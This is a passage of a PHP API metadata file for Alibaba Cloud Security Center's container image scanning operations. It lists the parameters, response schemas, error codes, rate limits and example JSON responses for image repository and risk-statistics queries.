'integer', 'format' => 'int64', 'example' => '1649814050000', 'title' => ''], 'FirstScanTime' => ['description' => 'The timestamp of the first scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1649814050000', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image baseline check result details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageListWithBaselineName'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageListWithBaselineName', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"5B8C2156-2DB9-5A42-99E7-F2ED5AE9EA1F\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 1,\\n \\"Count\\": 1\\n },\\n \\"ImageInfos\\": [\\n {\\n \\"MiddleRiskImage\\": 0,\\n \\"RiskStatus\\": \\"YES\\",\\n \\"ImageCreate\\": 1636962328000,\\n \\"Digest\\": \\"2e6daffce524ffeae66cccaa90c8fc47de912346dcec295c27395b6d66db6423\\",\\n \\"Tag\\": \\"v1\\",\\n \\"ImageUpdate\\": 1636974116000,\\n \\"InstanceId\\": \\"cri-a595qp31knh9****\\",\\n \\"LowRiskImage\\": 0,\\n \\"RepoType\\": \\"PRIVATE\\",\\n \\"RegionId\\": \\"cn-beijing\\",\\n \\"Uuid\\": \\"f58681174f944623345379e23b7b****\\",\\n \\"ImageSize\\": 157408623,\\n \\"RepoId\\": \\"crr-1lt6q7167yh6****\\",\\n \\"TotalItemCount\\": 3,\\n \\"HighRiskImage\\": 1,\\n \\"NoRiskImage\\": 0,\\n \\"ImageId\\": \\"cddb5fd33b34a1fabb358d0a19497cdfe362fe624821cb250947af0ea5cc****\\",\\n \\"RepoName\\": \\"scanner\\",\\n \\"ClusterId\\": \\"c08d5fc1a329a4b88950a253d082f1****\\",\\n \\"ClusterName\\": \\"docker-law\\",\\n \\"RepoNamespace\\": \\"libssh2\\",\\n \\"Pod\\": \\"22222-7xsqq\\",\\n \\"Namespace\\": \\"test-002\\",\\n \\"ContainerId\\": \\"04d20e98c8e2c93b7b864372084320a15a58c8671e53c972ce3a71d9c163****\\",\\n \\"Image\\": \\"registry.cn-wulanchabu.aliyuncs.com/sas_test/huxin-test-001:nuxeo6-conta****\\",\\n \\"InstanceName\\": \\"pre.mongo-196\\",\\n \\"InternetIp\\": \\"47.96.XX.XX\\",\\n \\"IntranetIp\\": \\"172.16.XX.XX\\",\\n \\"TargetName\\": \\"spod\\",\\n \\"TargetId\\": \\"m-bp17m0pc0xprzbwo****\\",\\n \\"TargetType\\": \\"ECS_IMAGE\\",\\n \\"LastScanTime\\": 1649814050000,\\n \\"FirstScanTime\\": 1649814050000\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageRepoCriteria' => [ 'summary' => 'Retrieves the supported search criteria for image repositories.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Value', 'in' => 'query', 'schema' => ['description' => 'The search value for image repositories.'."\n" ."\n" .'> This parameter supports fuzzy match for image IDs, tags, image instance IDs, repository names, repository namespaces, repository IDs, repository regions, digests, and repository types.', 'type' => 'string', 'required' => false, 'example' => '2.0.2', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F35F45B0-5D6B-4238-BE02-A62D0760E840', 'title' => ''], 'CriteriaList' => [ 'description' => 'The list of supported search criteria for image repositories.', 'type' => 'array', 'items' => [ 'description' => 'The supported search criteria for image repositories.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the search criterion. Valid values:'."\n" ."\n" .'- **input**: requires manual input of the search field.'."\n" .'- **select**: requires selecting a subtype from a drop-down list.', 'type' => 'string', 'example' => 'select', 'title' => ''], 'Name' => ['description' => 'The name of the search criterion. Valid values:'."\n" ."\n" .'- **instanceId**: image instance ID.'."\n" .'- **repoName**: repository name.'."\n" .'- **repoId**: repository ID.'."\n" .'- **repoNamespace**: repository namespace.'."\n" .'- **regionId**: image region.'."\n" .'- **vulStatus**: whether vulnerabilities exist.'."\n" .'- **alarmStatus**: whether security alerts exist.'."\n" .'- **hcStatus**: whether baseline risks exist.'."\n" .'- **riskStatus**: whether risks exist.'."\n" .'- **registryType**: repository type.'."\n" .'- **imageId**: image ID.'."\n" .'- **tag**: image tag.', 'type' => 'string', 'example' => 'vulStatus', 'title' => ''], 'Values' => ['description' => 'The available options when **Type** (the type of the search criterion) is **select** (selection type).'."\n" .'> When **Type** (the type of the search criterion) is **input** (input type), this parameter returns an empty value.', 'type' => 'string', 'example' => 'NO,YES', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve supported search criteria for image repositories', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageRepoCriteria'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageRepoCriteria', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F35F45B0-5D6B-4238-BE02-A62D0760E840\\",\\n \\"CriteriaList\\": [\\n {\\n \\"Type\\": \\"select\\",\\n \\"Name\\": \\"vulStatus\\",\\n \\"Values\\": \\"NO,YES\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageRepoDetailList' => [ 'summary' => 'Retrieves a list of image repositories.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasA217JR'], ], 'parameters' => [ [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The search conditions for assets. This parameter is in JSON format and contains the following fields:'."\n" .'- **name**: the search item.'."\n" .'- **value**: the value of the search item.'."\n" .'- **logicalExp**: the logical relationship among multiple search item values. Valid values:'."\n" .' - **OR**: The search item values are evaluated by using a logical OR.'."\n" .' - **AND**: The search item values are evaluated by using a logical AND.'."\n" .'> Call the [DescribeImageRepoCriteria](~~DescribeImageRepoCriteria~~) operation to query the supported search conditions.', 'type' => 'string', 'required' => false, 'example' => '[{"name":"vulStatus","value":"YES","logicalExp":"AND"}]', 'title' => ''], ], [ 'name' => 'LogicalExp', 'in' => 'query', 'schema' => ['description' => 'The logical relationship among multiple search conditions. Valid values:'."\n" .'- **OR**: The conditions are evaluated by using a logical OR.'."\n" .'- **AND**: The conditions are evaluated by using a logical AND.', 'type' => 'string', 'required' => false, 'example' => 'OR', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page when using paging. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the first page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF46038', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of image repositories.', 'type' => 'integer', 'format' => 'int32', 'example' => '19', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ImageRepoResponses' => [ 'description' => 'The list of image repositories.', 'type' => 'array', 'items' => [ 'description' => 'The image repository information.', 'type' => 'object', 'properties' => [ 'Endpoints' => ['description' => 'The endpoint of the image repository.', 'type' => 'string', 'example' => '['."\n" .' {'."\n" .' "domains": ['."\n" .' "****.cn-shenzhen.cr.aliyuncs.com"'."\n" .' ],'."\n" .' "type": "internet"'."\n" .' },'."\n" .' {'."\n" .' "domains": ['."\n" .' "****.cn-shenzhen.cr.aliyuncs.com"'."\n" .' ],'."\n" .' "type": "intranet"'."\n" .' },'."\n" .' {'."\n" .' "domains": ['."\n" .' "****.cn-shenzhen.cr.aliyuncs.com"'."\n" .' ],'."\n" .' "type": "vpc"'."\n" .' }'."\n" .']', 'title' => ''], 'RiskStatus' => ['description' => 'Indicates whether the image repository has security risks. Valid values:'."\n" ."\n" .'- **YES**: Security risks exist.'."\n" .'- **NO**: No security risks exist.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'VulStatus' => ['description' => 'Indicates whether the image repository has vulnerabilities. Valid values:'."\n" .'- **YES**: Vulnerabilities exist.'."\n" .'- **NO**: No vulnerabilities exist.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'AlarmStatus' => ['description' => 'Indicates whether the image repository has security alerts. Valid values:'."\n" .'- **YES**: Security alerts exist.'."\n" .'- **NO**: No security alerts exist.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'RegistryType' => ['description' => 'The type of the image repository. Valid values:'."\n" .'- **acr**: acr.'."\n" .'- **harbor**: harbor.'."\n" .'- **quay**: quay.'."\n" .'- **CI/CD**: CI/CD repository.', 'type' => 'string', 'example' => 'acr', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the image asset.', 'type' => 'string', 'example' => 'i-uf6fsg6xlmorug5****', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the image instance.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'RepoId' => ['description' => 'The ID of the image repository.', 'type' => 'string', 'example' => 'crr-2chlzf47w2rk****', 'title' => ''], 'HcCount' => ['description' => 'The number of baseline risks in the image repository.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'VulCount' => ['description' => 'The number of vulnerabilities in the image repository.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'HcStatus' => ['description' => 'Indicates whether the image repository has baseline risks. Valid values:'."\n" ."\n" .'- **NO**: No baseline risks exist.'."\n" .'- **YES**: Baseline risks exist.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'AlarmCount' => ['description' => 'The number of security alerts in the image repository.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RepoName' => ['description' => 'The name of the image repository.', 'type' => 'string', 'example' => 'zeus', 'title' => ''], 'RepoNamespace' => ['description' => 'The namespace of the image repository.', 'type' => 'string', 'example' => 'test-dev', 'title' => ''], 'ImageCount' => ['description' => 'The number of images.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'HasRiskImageCount' => ['description' => 'The number of images that have risks in the image repository.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'SourceBizTag' => ['title' => '', 'description' => 'The business purpose tag of the image.', 'type' => 'string', 'example' => 'PAI'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve image repository list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageRepoDetailList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageRepoDetailList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF46038\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 19,\\n \\"Count\\": 2\\n },\\n \\"ImageRepoResponses\\": [\\n {\\n \\"Endpoints\\": \\"[\\\\n {\\\\n \\\\\\"domains\\\\\\": [\\\\n \\\\\\"****.cn-shenzhen.cr.aliyuncs.com\\\\\\"\\\\n ],\\\\n \\\\\\"type\\\\\\": \\\\\\"internet\\\\\\"\\\\n },\\\\n {\\\\n \\\\\\"domains\\\\\\": [\\\\n \\\\\\"****.cn-shenzhen.cr.aliyuncs.com\\\\\\"\\\\n ],\\\\n \\\\\\"type\\\\\\": \\\\\\"intranet\\\\\\"\\\\n },\\\\n {\\\\n \\\\\\"domains\\\\\\": [\\\\n \\\\\\"****.cn-shenzhen.cr.aliyuncs.com\\\\\\"\\\\n ],\\\\n \\\\\\"type\\\\\\": \\\\\\"vpc\\\\\\"\\\\n }\\\\n]\\",\\n \\"RiskStatus\\": \\"NO\\",\\n \\"VulStatus\\": \\"NO\\",\\n \\"AlarmStatus\\": \\"NO\\",\\n \\"RegistryType\\": \\"acr\\",\\n \\"InstanceId\\": \\"i-uf6fsg6xlmorug5****\\",\\n \\"RegionId\\": \\"cn-shanghai\\",\\n \\"RepoId\\": \\"crr-2chlzf47w2rk****\\",\\n \\"HcCount\\": 0,\\n \\"VulCount\\": 0,\\n \\"HcStatus\\": \\"NO\\",\\n \\"AlarmCount\\": 0,\\n \\"RepoName\\": \\"zeus\\",\\n \\"RepoNamespace\\": \\"test-dev\\",\\n \\"ImageCount\\": 3,\\n \\"HasRiskImageCount\\": 2,\\n \\"SourceBizTag\\": \\"PAI\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageRepoList' => [ 'summary' => 'Retrieves statistics information on image defense switch configurations.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paged query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page during paging.'."\n" .'> Set PageSize to a non-empty value.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the defense switch. Valid values:'."\n" .'- **image_repo**: image repository defense.', 'type' => 'string', 'required' => true, 'example' => 'image_repo', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The dimension of the defense switch configuration. Valid values:'."\n" .'- **image_repo**: image repository ID.', 'type' => 'string', 'required' => true, 'example' => 'image_repo', 'title' => ''], ], [ 'name' => 'RepoName', 'in' => 'query', 'schema' => ['description' => 'The name of the image repository.', 'type' => 'string', 'required' => false, 'example' => 'script7', 'title' => ''], ], [ 'name' => 'RepoNamespace', 'in' => 'query', 'schema' => ['description' => 'The namespace of the container image repository.', 'type' => 'string', 'required' => false, 'example' => 'libssh2', 'title' => ''], ], [ 'name' => 'OperateType', 'in' => 'query', 'schema' => ['description' => 'The operation type. Valid values:'."\n" ."\n" .'- **count**: statistics'."\n" .'- **other**: other.', 'type' => 'string', 'required' => false, 'example' => 'count', 'title' => ''], ], [ 'name' => 'FieldName', 'in' => 'query', 'schema' => ['description' => 'The search field. Valid values:'."\n" ."\n" .'- **repoName**: image repository name'."\n" .'- **repoNamespace**: image repository namespace'."\n" ."\n" .'> This parameter takes effect only when **OperateType** is set to **other**.', 'type' => 'string', 'required' => false, 'example' => 'repoName', 'title' => ''], ], [ 'name' => 'FieldValue', 'in' => 'query', 'schema' => ['description' => 'The value of the search field.'."\n" .'> This parameter takes effect only when **OperateType** is set to **other**.', 'type' => 'string', 'required' => false, 'example' => 'zeus', 'title' => ''], ], [ 'name' => 'Selected', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the item is selected. Valid values:'."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'AllTargetCount' => ['description' => 'The total number of image repositories.', 'type' => 'integer', 'format' => 'int32', 'example' => '25', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7', 'title' => ''], 'AddTargetCount' => ['description' => 'The number of included image repositories.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'DelTargetCount' => ['description' => 'The number of excluded image repositories.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query during paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of statistics information entries per page in a paged query during paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of image repositories.', 'type' => 'integer', 'format' => 'int32', 'example' => '83', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paged query during paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ImageRepoList' => [ 'description' => 'The list of image repository information.', 'type' => 'array', 'items' => [ 'description' => 'The image repository information.', 'type' => 'object', 'properties' => [ 'Flag' => ['description' => 'Indicates whether the defense takes effect on the image repository. Valid values:'."\n" ."\n" .'- **add**: Takes effect.'."\n" .'- **del**: Does not take effect.', 'type' => 'string', 'example' => 'add', 'title' => ''], 'RepoName' => ['description' => 'The name of the container image repository.', 'type' => 'string', 'example' => 'zeus', 'title' => ''], 'RepoNamespace' => ['description' => 'The namespace of the container image repository.', 'type' => 'string', 'example' => 'sas-script', 'title' => ''], 'ImageCount' => ['description' => 'The number of images.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve image defense switch configuration statistics information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageRepoList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageRepoList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"AllTargetCount\\": 25,\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\",\\n \\"AddTargetCount\\": 20,\\n \\"DelTargetCount\\": 5,\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 83,\\n \\"Count\\": 2\\n },\\n \\"ImageRepoList\\": [\\n {\\n \\"Flag\\": \\"add\\",\\n \\"RepoName\\": \\"zeus\\",\\n \\"RepoNamespace\\": \\"sas-script\\",\\n \\"ImageCount\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageRiskLevelStatistic' => [ 'summary' => 'Queries the number of images that have security risk alerts, including vulnerabilities, baselines, and malicious sample risks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A60DA4EC-7CD8-577D-AD73-******', 'title' => ''], 'ImageRiskLevelList' => [ 'description' => 'The risk information at the image level, including risks from vulnerability, baseline, and malicious file detection.', 'type' => 'array', 'items' => [ 'description' => 'The risk information at the image level.', 'type' => 'object', 'properties' => [ 'Cnt' => ['description' => 'The number of images at the specified risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'ImageRiskLevel' => ['description' => 'The image risk level. Valid values:'."\n" .' - **3**: high risk'."\n" .'- **2**: medium risk'."\n" .'- **1**: low risk'."\n" .'- **0**: no risk.', 'type' => 'string', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image risk statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageRiskLevelStatistic'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageRiskLevelStatistic', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A60DA4EC-7CD8-577D-AD73-******\\",\\n \\"ImageRiskLevelList\\": [\\n {\\n \\"Cnt\\": 12,\\n \\"ImageRiskLevel\\": \\"0\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageScanAuthCount' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The China Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '892NYH839-0EDC-4CD0-A2EF-5BD294656C99', 'title' => ''], 'ImageScan' => [ 'description' => 'The authorization details of image security scanning.', 'type' => 'object', 'properties' => [ 'ScanCount' => ['description' => 'The number of used authorization quotas.', 'type' => 'integer', 'format' => 'int64', 'example' => '5489', 'title' => ''], 'ImageScanCapacity' => ['description' => 'The total number of authorization quotas.', 'type' => 'integer', 'format' => 'int64', 'example' => '15340', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the purchased Security Center instance.', 'type' => 'string', 'example' => 'sas-qdl123412****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image security scan authorization information', 'summary' => 'Queries the authorization quota information for image security scanning.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageScanAuthCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageScanAuthCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"892NYH839-0EDC-4CD0-A2EF-5BD294656C99\\",\\n \\"ImageScan\\": {\\n \\"ScanCount\\": 5489,\\n \\"ImageScanCapacity\\": 15340,\\n \\"InstanceId\\": \\"sas-qdl123412****\\"\\n }\\n}","type":"json"}]', ], 'DescribeImageSecurityScanCount' => [ 'summary' => 'Retrieves the number of image security events.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'RepoRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the container image repository.', 'type' => 'string', 'required' => false, 'example' => 'cn-beijing', 'title' => ''], ], [ 'name' => 'RepoInstanceId', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the container image.'."\n" ."\n" .'> Invoke the [DescribeImageInstances](~~DescribeImageInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'cri-p2jahwuuwuk7****', 'title' => ''], ], [ 'name' => 'RepoId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container image repository.', 'type' => 'string', 'required' => false, 'example' => '3df5b5a1f2339eb7ebc7d474b8d4****', 'title' => ''], ], [ 'name' => 'ImageTag', 'in' => 'query', 'schema' => ['description' => 'The image tag.', 'type' => 'string', 'required' => false, 'example' => 'c958b80f-prd_default-9bb0****', 'title' => ''], ], [ 'name' => 'ImageDigest', 'in' => 'query', 'schema' => ['description' => 'The SHA256 value of the image digest.', 'type' => 'string', 'required' => false, 'example' => 'a7978d51f5eddf7612ab15ae46bd4b4257bf59da77c2aafc9d9d8ab41bb3****', 'title' => ''], ], [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the event is handled. Valid values:'."\n" .'- **Y**: Handled. '."\n" .'- **N**: Not handled. '."\n" .'- **A**: All.', 'type' => 'string', 'required' => false, 'example' => 'N', 'title' => ''], ], [ 'name' => 'ImageUuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the image.', 'type' => 'string', 'required' => false, 'example' => '325bfa067ae6c678e59e8a1b34cc****', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster for image security scanning.', 'type' => 'string', 'required' => false, 'example' => 'cdbbe7aa56cbf4b8f830f83718d26****', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The scan scope.', 'type' => 'array', 'items' => ['description' => 'The scan scope. Valid values:'."\n" ."\n" .'- **image**: image.'."\n" .'- **container**: container.', 'type' => 'string', 'required' => false, 'example' => 'image', 'title' => ''], 'required' => false, 'maxItems' => 2, 'title' => '', 'example' => '', ], ], [ 'name' => 'Uuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 